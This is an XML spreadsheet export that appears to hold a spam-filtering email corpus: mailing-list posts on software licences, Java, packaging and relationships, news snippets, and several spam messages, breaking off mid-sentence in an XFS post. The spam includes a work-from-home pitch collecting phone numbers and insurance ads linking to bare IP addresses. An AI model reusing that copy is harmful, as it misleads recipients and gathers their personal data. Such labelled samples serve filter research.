 MGE UPS Systems's Personal Solution Pac (MGE power management software)
 Real Networks's RealPlayer
 Adobe Acrobat Reader
 Software AG's ADABAS D
 H+BEDV Datentechnik GmbH's AntiVir V
 Knox Sofware Comm.'s Arkeia
 Datan's dataplore digital-signal analysis package
 Enterprise Solution Server (ESS) ERP system
 Sun Microsystems Java2
 Borland Kylix Open Edition
 Moneydance
 OpenEIS enterprise information system
 Opera Software's Opera browser
 Heisch Automatisierungstechnik's rk512 serial interface to Simatic S5 /
     S7 plcs
 SAP database
 Sun Microsystems Star Office
 VMware, Inc's VMware
 http://www.vshop.org/'s vshop e-commerce software for MySQL
 All of the latter category either are available only via retail sale, or
 are available lawfully on the public Internet only from authorised
 distribution sites or on CDs from authorised distributors.  The exact
 terms differ.
 For example, you can download Borland Kylix Open Edition from
 borland.com, free of charge -- but you'll notice there's no mention of
 any right to redistribute.  That right is reserved by default to the
 copyright owners, and Borland doesn't include it in the Kylix
 proprietary licence.
 -- 
 Cheers,               "We're sorry; you have reached an imaginary number.
 Rick Moen             Please rotate your 'phone ninety degrees and try again."
 rick@linuxmafia.com
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Greetings from Calif!
</t>
  </si>
  <si>
    <t xml:space="preserve">
 !Want to make a million bucks this year?
 Me too but it's probably not going happen!
 However if your looking for the opportunity to
 make a couple thousand a week,
 working form home, with your pc, we need to talk.
 If you're over 18 and a US resident,
 Just Click REPLY
 Send me your Name, State,
 Complete telephone number,
 and the best time to contact you.
 I will personally speak with you within 48 hours.
 To be removed from this mailing list,  please type remove in the subject column.
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Let Insurance Companies Compete For Your Policy. $6.50 per month rbz
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;body&gt;
 &lt;font size="2" PTSIZE="10"&gt;
 &lt;table height="338" cellSpacing="0" cellPadding="0" width="539" border="0" style="border:12px double #000000; border-collapse:collapse; padding-left:4; padding-right:4; padding-top:1; padding-bottom:1" bordercolor="#111111" bordercolorlight="#FFFFFF" bordercolordark="#FFFFFF"&gt;
   &lt;tr&gt;
     &lt;td width="4" height="423" bgcolor="#99CC00"&gt;&amp;nbsp;&lt;/td&gt;
     &lt;td vAlign="top" align="left" width="535" height="423" style="border-style: solid; border-width: 0" bgcolor="#99CC00"&gt;
     &lt;table cellSpacing="0" cellPadding="4" width="95%" border="0" bgcolor="#FFFFFF" style="border-collapse: collapse" bordercolor="#111111"&gt;
       &lt;tr&gt;
         &lt;td vAlign="top" align="right" height="424" bgcolor="#99CC00"&gt;
         &lt;table cellSpacing="0" cellPadding="0" width="100%" border="0"&gt;
           &lt;tr&gt;
             &lt;td&gt;
             &lt;div align="left"&gt;
               &lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;&lt;b&gt;
               &lt;font face="Verdana, Arial, Helvetica, sans-serif" color="#000000" size="2"&gt;
               &lt;br&gt;
               &lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;b&gt;
 &lt;font PTSIZE="10" face="Verdana" style="font-size: 10.5pt"&gt;
 You can't predict the future, but you can always prepare for it.&lt;/font&gt;&lt;/b&gt;&lt;/div&gt;
             &lt;div align="left"&gt;
 &amp;nbsp;&lt;/div&gt;
             &lt;div align="center"&gt;
               &lt;b&gt;
               &lt;font face="Verdana, Arial, Helvetica, sans-serif" color="#FF0000" style="font-size: 16.5pt"&gt;
               DOUBLE &lt;/font&gt;
               &lt;font face="Verdana, Arial, Helvetica, sans-serif" color="#FFFFFF" style="font-size: 16.5pt"&gt;
               Your Life Insurance Policy For&lt;/font&gt;&lt;font face="Verdana, Arial, Helvetica, sans-serif" color="#FF0000" style="font-size: 16.5pt"&gt; 
               NO EXTRA COST!&lt;/font&gt;&lt;/b&gt;&lt;/div&gt;
             &lt;div align="center"&gt;
               &amp;nbsp;&lt;/div&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
           &lt;tr&gt;
             &lt;td&gt;
             &lt;div align="left"&gt;
               &lt;font face="Verdana" size="2" PTSIZE="10"&gt;Compare rates from top insurance companies around the country&lt;br&gt;
 In our life and times, it's important to plan for your family's future, while 
 being comfortable financially. Choose the right Life Insurance policy today.&lt;/font&gt;&lt;/div&gt;
             &lt;div align="left"&gt;
               &lt;font face="Verdana" size="2" PTSIZE="10"&gt;&amp;nbsp;&lt;/font&gt;&lt;/div&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;table cellSpacing="0" cellPadding="0" width="504" border="0" style="position: relative; border-collapse: collapse" bordercolor="#111111" height="1"&gt;
           &lt;tr&gt;
             &lt;td vAlign="top" width="325" height="1" bgcolor="#FFFFFF"&gt;
             &lt;div align="center"&gt;
               &lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2" color="#838285"&gt;&lt;b&gt;
               &lt;br&gt;
               &lt;/a&gt;
               &lt;/b&gt;&lt;/font&gt;&lt;b&gt;&lt;font face="Verdana" size="2"&gt;&lt;font PTSIZE="10"&gt;You'll be able to compare rates and get a&lt;/font&gt;&lt;font color="#838285" PTSIZE="10"&gt;
               &lt;/font&gt;&lt;font PTSIZE="10" color="#FF0000"&gt;Free Application&lt;/font&gt;&lt;font color="#838285" PTSIZE="10"&gt;
               &lt;/font&gt;&lt;font PTSIZE="10"&gt;in less than a 
 minute!&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/div&gt;
             &lt;p align="center"&gt;&lt;b&gt;
 &lt;font PTSIZE="10" face="Verdana" color="#FF0000"&gt;
 COMPARE YOUR COVERAGE
 &lt;/font&gt;
             &lt;/b&gt;&lt;/p&gt;
             &lt;dl&gt;
               &lt;dd&gt;
 &lt;font size="5" PTSIZE="10" face="Verdana"&gt;
               &lt;b&gt;$250,000&lt;/b&gt;&lt;/font&gt;&lt;font size="2" PTSIZE="10" face="Verdana" color="#838285"&gt;&lt;br&gt;
               as low as
 &lt;/font&gt;
               &lt;b&gt;
 &lt;font PTSIZE="10" face="Verdana"&gt;
               &lt;font size="5" color="#FF0000"&gt;$6.50&lt;/font&gt;&lt;font color="#838285"&gt;
               &lt;/font&gt;per month&lt;/font&gt;&lt;/b&gt;&lt;/dd&gt;
               &lt;dt&gt;&amp;nbsp;&lt;/dt&gt;
               &lt;dd&gt;
 &lt;font size="2" PTSIZE="10"&gt;
 &lt;font size="5" PTSIZE="10" face="Verdana"&gt;
               &lt;b&gt;$500,000&lt;/b&gt;&lt;/font&gt;&lt;font size="2" PTSIZE="10" face="Verdana" color="#838285"&gt;&lt;br&gt;
               as low as
 &lt;/font&gt;
 &lt;/font&gt;
               &lt;b&gt;
 &lt;font PTSIZE="10" face="Verdana"&gt;
 &lt;font size="5" PTSIZE="10" color="#FF0000"&gt;
               $9.50&lt;/font&gt;&lt;font size="2" PTSIZE="10" color="#838285"&gt;
 &lt;/font&gt;
 &lt;font size="2" PTSIZE="10"&gt;
               per month&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/dd&gt;
               &lt;dt&gt;&amp;nbsp;&lt;/dt&gt;
               &lt;dd&gt;
 &lt;font size="2" PTSIZE="10"&gt;
 &lt;font size="5" PTSIZE="10" face="Verdana"&gt;
               &lt;b&gt;$1,000,000&lt;/b&gt;&lt;/font&gt;&lt;font size="2" PTSIZE="10" face="Verdana" color="#838285"&gt;&lt;br&gt;
               as low as
 &lt;/font&gt;
 &lt;/font&gt;
               &lt;b&gt;
 &lt;font PTSIZE="10" face="Verdana"&gt;
 &lt;font size="5" PTSIZE="10" color="#FF0000"&gt;
               $15.50&lt;/font&gt;&lt;font size="2" PTSIZE="10" color="#838285"&gt;
 &lt;/font&gt;
 &lt;font size="2" PTSIZE="10"&gt;
               per month&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/dd&gt;
               &lt;dt&gt;&amp;nbsp;&lt;/dt&gt;
               &lt;div align="left"&gt;
                 &lt;ul&gt;
                   &lt;li&gt;
                   &lt;dt&gt;
 &lt;font PTSIZE="10"&gt;
                   &lt;b&gt;&lt;font face="Verdana" size="2"&gt;Get your&lt;/font&gt;&lt;font color="#838285" face="Verdana" size="2"&gt;
                   &lt;/font&gt;&lt;font face="Verdana" size="2" color="#FF0000"&gt;FREE&lt;/font&gt;&lt;font color="#838285" face="Verdana" size="2"&gt;
                   &lt;/font&gt;&lt;font face="Verdana" size="2"&gt;instant quotes... &lt;/font&gt;
                   &lt;/b&gt;
 &lt;/font&gt;
                   &lt;/dt&gt;
                   &lt;/li&gt;
                   &lt;li&gt;
                   &lt;dt&gt;
 &lt;font PTSIZE="10"&gt;
                   &lt;b&gt;&lt;font face="Verdana" size="2"&gt;Compare the lowest prices, then...
                   &lt;/font&gt;&lt;/b&gt;
 &lt;/font&gt;
                   &lt;/dt&gt;
                   &lt;/li&gt;
                   &lt;li&gt;
                   &lt;dt&gt;
 &lt;font PTSIZE="10"&gt;
                   &lt;b&gt;&lt;font face="Verdana" size="2"&gt;Select a company and Apply Online.
                   &lt;/font&gt;&lt;/b&gt;
 &lt;/font&gt;
                   &lt;/dt&gt;
                   &lt;/li&gt;
                 &lt;/ul&gt;
               &lt;/div&gt;
             &lt;/dl&gt;
             &lt;div align="center"&gt;
               &lt;b&gt;
               &lt;a title="http://66.231.133.63/index.html?ID=A12b" target="new_win" href="http://66.231.133.68/quote/index.html?ID=I512b"&gt;
               &lt;font color="#FF0000" size="2" PTSIZE="10" face="Verdana"&gt;DON'T 
               MISS THIS!! GET YOUR FREE INSTANT QUOTE &lt;/font&gt;
               &lt;font color="#FF0000" face="Verdana,Arial,Helvetica,sans-serif" size="2"&gt;
               CLICK FOR YOUR FREE QUOTE, NOW!&lt;/font&gt;&lt;/a&gt;&lt;/b&gt;&lt;/div&gt;
             &lt;div align="center"&gt;
               &amp;nbsp;&lt;/div&gt;
             &lt;div align="center"&gt;
 &lt;font size="2" PTSIZE="10"&gt;
               &lt;b&gt;
 &lt;font size="2" PTSIZE="10" face="Verdana" color="#838285"&gt;
 (Smoker rates also available)&lt;/font&gt;&lt;/b&gt;&lt;/font&gt;&lt;/div&gt;
             &lt;/td&gt;
             &lt;td vAlign="top" width="4" height="1"&gt;
             &lt;div align="right"&gt;
               &amp;nbsp;&lt;/div&gt;
             &lt;/td&gt;
             &lt;td width="175" height="1" bgcolor="#99CC00" bordercolor="#006600" align="center"&gt;
             &lt;dl&gt;
               &lt;p align="left"&gt;&lt;b&gt;
               &lt;font face="Verdana" style="font-size: 16pt" color="#FFFFFF"&gt;Make&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 
               Insurance Companies Compete For Your Insurance.&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
               &lt;p align="left"&gt;&amp;nbsp;&lt;/p&gt;
             &lt;/dl&gt;
             &lt;p align="left"&gt;&lt;b&gt;
             &lt;font face="Verdana" style="font-size: 16pt" color="#FFFFFF"&gt;We Have 
             Eliminated The Long Process Of Finding The Best Rate By Giving You 
             Access To Multiple Insurance Companies All At Once.&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;table cellSpacing="0" cellPadding="3" width="505" border="0"&gt;
           &lt;tr&gt;
             &lt;td colSpan="2" height="64" bgcolor="#000000" width="499"&gt;
             &lt;font face="Verdana, Arial, Helvetica, sans-serif" size="2"&gt;&lt;b&gt;
             &lt;table cellSpacing="2" cellPadding="0" width="482" border="0" height="38"&gt;
               &lt;tr&gt;
                 &lt;td width="327" height="36" style="border-style: solid; border-width: 0"&gt;
                 &lt;font face="Verdana,Arial,Helvetica,sans-serif" size="2" color="#FFFFFF"&gt;Apply 
                 now and one of our Insurance Brokers will get back to you within 
                 48 hours.&lt;/font&gt;&lt;/td&gt;
                 &lt;td width="141" bgcolor="#FF0000" height="36" style="border-left-style: solid; border-left-width: 1"&gt;
                 &lt;p align="center"&gt;&lt;b&gt;&lt;font color="#FFFFFF" size="4"&gt;
                 &lt;a style="text-decoration: none" href="http://66.231.133.68/quote/index.html?ID=I512b"&gt;
                 &lt;font color="#FFFFFF"&gt;CLICK HERE!&lt;/font&gt;&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
             &lt;/b&gt;&lt;/font&gt;&lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;/td&gt;
       &lt;/tr&gt;
     &lt;/table&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;p&gt;If You wish to be removed from future mailings please &amp;quot;&lt;a href="http://66.231.133.68/final/index_remoov.html?ID=1512"&gt;Clicking 
 Here&lt;/a&gt;&amp;quot; . &lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 &amp;nbsp;&lt;/font&gt;&lt;/p&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Liberalism in America
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_0005_01C26412.7545C1D0
 Content-Type: text/plain;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: 7bit
 liberalism
 propagandized as meddling
 in truth, the middle
 "American liberalism believes that in this respect it has made a major
 contribution to the grand strategy of freedom. Where both capitalists and
 socialists in the 1930's were trying to narrow the choice to either/or --
 either laissez-faire capitalism or bureaucratic socialism -- the New Deal
 persisted in its vigorous faith that human intelligence and social
 experiment could work out a stable foundation for freedom in a context of
 security and for security in a context of freedom. That faith remains the
 best hope of free society today."
 fluid yet crunchy,
 gg
  http://www.english.upenn.edu/~afilreis/50s/schleslib.html
 ------=_NextPart_000_0005_01C26412.7545C1D0
 Content-Type: application/octet-stream;
 	name="Liberalism in America.url"
 Content-Transfer-Encoding: 7bit
 Content-Disposition: attachment;
 	filename="Liberalism in America.url"
 [DEFAULT]
 BASEURL=http://www.english.upenn.edu/~afilreis/50s/schleslib.html
 [InternetShortcut]
 URL=http://www.english.upenn.edu/~afilreis/50s/schleslib.html
 Modified=E0824ED43364C201DE
 ------=_NextPart_000_0005_01C26412.7545C1D0--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Irish Internet Users post from yyyycc@hackwatch.com requires approval
</t>
  </si>
  <si>
    <t xml:space="preserve">As list administrator, your authorization is requested for the
 following mailing list posting:
     List:    Irish Internet Users@iiu.taint.org
     From:    yyyycc@hackwatch.com
     Subject: Re: [IIU] IE nameserver problems
     Reason:  Post to moderated list
 At your convenience, visit:
     http://iiu.taint.org/mailman/admindb/iiu
 to approve or deny the request.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Profiteers resell Africa's Aids drugs
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-5,8536504,215/
 Date: 2002-10-04T03:40:03+01:00
 Shipments of low-cost drugs being intercepted and sold at vast profits.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: The secret passion that staggered Westminster
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-0,8357896,215/
 Date: 2002-09-29T00:39:58+01:00
 *Politics:* She was vivacious, he was Mr Grey. Theirs was a love no one 
 imagined.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [use Perl] Headlines for 2002-09-13
</t>
  </si>
  <si>
    <t xml:space="preserve">use Perl Daily Headline Mailer
 The Perl Journal Returns Online
     posted by pudge on Wednesday September 11, @21:59 (links)
     http://use.perl.org/article.pl?sid=02/09/12/026254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</si>
  <si>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gentoo 0.11.31 released...
</t>
  </si>
  <si>
    <t xml:space="preserve">as root, 'service xinetd reload'
 HTH,
 Michel
 Matthias Haase wrote:
 &gt;Hi, Matthias...
 &gt;
 &gt;  
 &gt;
 &gt;&gt;Indeed, I had repackaged a first version, but without fam support (not
 &gt;&gt;released). I'll release the package with fam support right now ;-)
 &gt;&gt;    
 &gt;&gt;
 &gt;
 &gt;...your package doesn't require a special buildlevel for the installed fam
 &gt;rpm, it checks for libfam.* libs.
 &gt;In result, I could do an upgrade of gentoo for two older boxes here in our
 &gt;company - still RH 7.1.
 &gt;I don't know about the 'cleanless' of this (compiling mostly the latest
 &gt;sources on our devel box myself).
 &gt;
 &gt;Because non default fam rpm for RH 7.1 exists, I have to use the
 &gt;fam-2.6.4-11.i386.rpm for RH 7.2 instead.
 &gt;No probs. But the scripts inside this rpm doesn't restart xinetd on the
 &gt;fly, I have currently started fam by hand.
 &gt;
 &gt;The sgi_fam script exists in /etc/xinetd.d, so I hope, that fam is up and
 &gt;running on the next boot too.
 &gt;
 &gt;  
 &gt;
 __________________________________________________
 Do You Yahoo!?
 Everything you'll ever need on one web page
 from News and Sport to Email and Music Charts
 http://uk.my.yahoo.com
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Financial Power You Can Depend On
</t>
  </si>
  <si>
    <t xml:space="preserve">This is a multi-part message in MIME format.
 ------=_NextPart_000_181FC9_01C263E7.DE66F600
 Content-Type: text/plain;
 	charset="Windows-1252"
 Content-Transfer-Encoding: quoted-printable
 =20
  Financial Power You Can Depend On
 =20
  Very Competitive Rates=0A=
 Guaranteed 6 Years
  Let AIG's Annuity Portfolio Work for You!=09
 A.M. Best Company	 "A+" Superior	=20
 Standard &amp; Poor's Corp.	 "AA+" Very Strong	=20
 Fitch	 "AA+" Very Strong	=20
 Moody's Investors Service	 "Aa1" Excellent	=20
 Call today for more information!
  888-237-4210
 - or -
 Please fill out the form below for more information	=20
 Name:	  	 =09
 E-mail:	  =09
 Phone:	  =09
 City:	  	State:	  =09
  	    =09
 =20
  AIG Annuity Insurance Company
 We don't want anyone to receive our mailings who does not wish to
 receive them. This is a professional communication sent to insurance
 professionals. To be removed from this mailing list, DO NOT REPLY to
 this message. Instead, go here: insuranceiq.com/optout
 &lt;http://www.insuranceiq.com/optout/&gt;=20
 Legal Notice &lt;http://www.insiq.com/legal.htm&gt;=20
 ------=_NextPart_000_181FC9_01C263E7.DE66F600
 Content-Type: text/html;
 	charset="iso-8859-1"
 Content-Transfer-Encoding: quoted-printable
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;Financial Power You Can Depend On&lt;/title&gt;
 &lt;meta http-equiv=3D"Content-Type" content=3D"text/html; =
 charset=3Diso-8859-1"&gt;
 &lt;/head&gt;
 &lt;body bgcolor=3D"#666666" text=3D"#000000"&gt;
 &lt;font face=3D"Arial, Helvetica, sans-serif"&gt;=20
 &lt;table width=3D"550" border=3D"1" align=3D"center" cellpadding=3D"0" =
 cellspacing=3D"0" bordercolor=3D"#000000" bgcolor=3D"#FFFFFF"&gt;
   &lt;tr&gt;=20
     &lt;td&gt;
 			&lt;img src=3D"http://iiq.us/images/aig/setrate/20020912-101.jpg" =
 width=3D"550" height=3D"110"&gt;&lt;br&gt;
 			&lt;img src=3D"http://iiq.us/images/aig/setrate/20020912-102.jpg" =
 width=3D"550" height=3D"115" alt=3D'Financial Power You Can Depend =
 On'&gt;&lt;br&gt;
 			&lt;img src=3D"http://iiq.us/images/aig/setrate/20020912-103.jpg" =
 width=3D"550" height=3D"107"&gt;&lt;br&gt;
       &lt;img src=3D"http://iiq.us/images/aig/setrate/20020912-104.jpg" =
 alt=3D"Very Competitive Rates&amp;#10;Guaranteed 6 Years" width=3D"550" =
 height=3D"114"&gt;&lt;br&gt;
 			&lt;table width=3D"100%" cellpadding=3D"4" cellspacing=3D"0" =
 bgcolor=3D"#000000"&gt;
         &lt;tr&gt;=20
           &lt;td&gt;
             &lt;table width=3D"100%" border=3D"1" cellpadding=3D"2" =
 cellspacing=3D"0" bordercolor=3D"#FFFFFF" bgcolor=3D"#CCCCCC"&gt;
               &lt;tr&gt;=20
                 &lt;td colspan=3D"2" align=3D"center" =
 bgcolor=3D"#FFFFFF"&gt;&lt;img =
 src=3D"http://iiq.us/images/aig/setrate/20020912-5a.gif" alt=3D"Let =
 AIG's Annuity Portfolio Work for You!" width=3D"521" height=3D"47"&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr align=3D"center"&gt;=20
                 &lt;td width=3D"50%"&gt;&lt;b&gt;&lt;font size=3D"2"&gt;A.M. Best =
 Company&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                 &lt;td width=3D"50%"&gt;&lt;b&gt;&lt;font size=3D"2"&gt;&amp;quot;A+&amp;quot; =
 Superior&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr align=3D"center"&gt;=20
                 &lt;td&gt;&lt;b&gt;&lt;font size=3D"2"&gt;Standard &amp;amp; Poor's =
 Corp.&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                 &lt;td&gt;&lt;b&gt;&lt;font size=3D"2"&gt;&amp;quot;AA+&amp;quot; Very =
 Strong&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr align=3D"center"&gt;=20
                 &lt;td&gt;&lt;b&gt;&lt;font size=3D"2"&gt;Fitch&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                 &lt;td&gt;&lt;b&gt;&lt;font size=3D"2"&gt;&amp;quot;AA+&amp;quot; Very =
 Strong&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr align=3D"center"&gt;=20
                 &lt;td&gt;&lt;b&gt;&lt;font size=3D"2"&gt;Moody's Investors =
 Service&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                 &lt;td&gt;&lt;b&gt;&lt;font size=3D"2"&gt;&amp;quot;Aa1&amp;quot; =
 Excellent&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;
           &lt;td align=3D"center"&gt;
             &lt;b&gt;&lt;font color=3D"#FFFFFF" size=3D"2"&gt;Call today for more =
 information!&lt;br&gt;
             &lt;img src=3D"http://iiq.us/images/aig/setrate/20020912-4.gif" =
 alt=3D"888-237-4210" width=3D"536" height=3D"93"&gt;&lt;br&gt;
             - or -&lt;/font&gt;&lt;/b&gt;&lt;br&gt;
             &lt;table width=3D"95%" border=3D"1" cellpadding=3D"0" =
 cellspacing=3D"0" bordercolor=3D"#000000"&gt;
               &lt;tr&gt;=20
                 &lt;form method=3D"post" =
 action=3D"http://65.217.159.103/response/response.asp"&gt;
                   &lt;td&gt;=20
                     &lt;table width=3D"100%" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"2" align=3D"center" bgcolor=3D"#eeeeee"&gt;
                       &lt;tr bgcolor=3D"#21467B"&gt;=20
                         &lt;td colspan=3D"5" align=3D"center"&gt;&lt;b&gt;&lt;font =
 color=3D"#FFFFFF" size=3D"2"&gt;Please fill out the form below for more =
 information&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;Name:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td colspan=3D"3"&gt;=20
                           &lt;input type=3D"text" name=3D"contactname" =
 size=3D"50"&gt;
                         &lt;/td&gt;
                         &lt;td rowspan=3D"5" valign=3D"middle" =
 align=3D"center"&gt;&lt;img src=3D"http://iiq.us/images/q3.gif" width=3D"43" =
 height=3D"50"&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;E-mail:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td colspan=3D"3"&gt;=20
                           &lt;input type=3D"text" name=3D"email" =
 size=3D"50"&gt;
                         &lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;Phone:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td colspan=3D"3"&gt;=20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&lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"15%" align=3D"right"&gt;&amp;nbsp;&lt;/td&gt;
                         &lt;td width=3D"30%" colspan=3D'3'&gt;=20
                           &lt;input type=3D"submit" name=3D"btnsubmit" =
 value=3D"Submit"&gt;
                           &lt;input type=3D"hidden" =
 name=3D"hdnRecipientTxt" value=3D"jerry_livers@aigannuity.com"&gt;
                           &lt;input type=3D"hidden" name=3D"hdnSubjectTxt" =
 value=3D"AIG SetRate Ad Inquiry"&gt;
                         &lt;/td&gt;
                       &lt;/tr&gt;
                     &lt;/table&gt;
                   &lt;/td&gt;
                 &lt;input type=3D'hidden' name=3D'SentTo' value=3D'304704'&gt;
 &lt;/form&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
             &lt;br&gt;
             &lt;img src=3D"http://iiq.us/images/aig/setrate/20020912-3.gif" =
 alt=3D"AIG Annuity Insurance Company" width=3D"540" height=3D"83"&gt;
           &lt;/td&gt;
         &lt;/tr&gt;
       &lt;/table&gt;
 		&lt;/td&gt;
   &lt;/tr&gt;
   &lt;tr&gt;=20
     &lt;td width=3D"100%" bgcolor=3D"#cccccc" align=3D"center"&gt;
 			&lt;p&gt;&lt;font face=3D"Arial, Helvetica, sans-serif" size=3D"1"&gt;We don't =
 want anyone to receive our mailings who does not=20
 			wish to receive them. This is a professional communication=20
 			sent to insurance professionals. To be removed from this mailing=20
 			list, &lt;b&gt;DO NOT REPLY&lt;/b&gt; to this message. Instead, go here: &lt;a =
 href=3D"http://www.insuranceiq.com/optout/"&gt;=20
 			insuranceiq.com/optout&lt;/a&gt;&lt;/font&gt;&lt;/p&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;center&gt;
   &lt;a href=3D"http://www.insiq.com/legal.htm"&gt;&lt;font size=3D"1" =
 face=3D"Arial, Helvetica, sans-serif"&gt;Legal Notice &lt;/font&gt;&lt;/a&gt;=20
 &lt;/center&gt;
 &lt;/font&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 ------=_NextPart_000_181FC9_01C263E7.DE66F600--
</t>
  </si>
  <si>
    <t xml:space="preserve">Quoting Nick Murtagh (nickm@go2.ie):
 &gt; The same one as provided on www.sapdb.org? 
 &gt; Which is released under the GPL/LGPL?
 I honestly don't know.  I made that list a long time ago, and certainly
 didn't re-research it before posting it today.  So, I offer three
 candidate explanations:
 1.  I muffed that part, the first time, and was talking through my hat.
 2.  SAP had a proprietary version licensed to SuSE at the time.
 3.  SAP still have one licensed to SuSE today.
 I'm not sure which applies.  #1 is certainly a good possibility.
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sun, 1 Sep 2002, Mr. FoRK wrote:
 &gt; &gt; 6.  Hardware is getting so fast that I'm not sure if the performance
 &gt; &gt; difference between Java and C/C++ are relevant any more.
 &gt;
 &gt; When out-of-the-box parsing &amp; transform of XML in java is 25x slower than
 &gt; C++ on the same hardware then it does matter.
 Yea, and that on top of the 100x of all the parsing engines over just
 bigendian'ing it and passing the data (5x+++) in the raw. Then it REALLY
 matters.
 - Adam L. "Duncan" Beberg
   http://www.mithral.com/~beberg/
   beberg@mithral.com
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, Sep 02, 2002 at 03:19:13AM -0400, Eirikur Hallgrimsson wrote:
 &gt; My opinion is biased because of the disgraceful state of non-Windoze 
 &gt; browser java implementations.
 Horrors. Applets are kinda sucky. The cool kids are using Java to write
 server applications, not browser craplets.
 The giggle-inducing irony of the whole Java thing is how Sun's strategy
 backfired. They produced a platform that was supposed to dwell on the
 client side, where it would commoditize those clients. Instead, it turns
 out to be the perfect language to write server applications in, and it has
 successfully commoditized servers. Ooops!
 -- 
 njl
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;&gt;&gt;&gt;&gt; "E" == Eirikur Hallgrimsson &lt;eh@mad.scientist.com&gt; writes:
     E&gt; You just can't tell important things from a picture and a few
     E&gt; words.  It's not how we are built.  There's no geek code for
     E&gt; the heart and soul.
 Nor is there a Turing Test, even for someone with whom you've spent 11
 years, boom, bust and boom again, and 3 children (trust me) There is
 no magic litmus test other than the totally empirical: "Try it and
 see"
 "String bags full of oranges
  And matters of the heart,
  People laugh at /anything/
  And things just fall apart."
  - michael leunig
 The only real test, the only /sensible/ test, is to look back and
 realize your relationship has lasted 50 years and see no reason to
 believe it couldn't last another 50.  In the absense of 50 years of
 actual (ahem) hands-on experiential data, a photo and a few words are
 as good as any, provided you are prepared for the dynamics of it.
 Love is a verb.  Sex is a /shared/ pursuit.  There is no
 'relation-ship', there is only the crew.  sail away!
 -- 
 Gary Lawrence Murphy - garym@teledyn.com - TeleDynamics Communications
  - blog: http://www.auracom.com/~teledyn - biz: http://teledyn.com/ -
   "Computers are useless. They can only give you answers." (Picasso)
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: a deadlock problem
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi XFS developers,
 When studying xfs code(2.4.19), I found that the inode will be locked by 
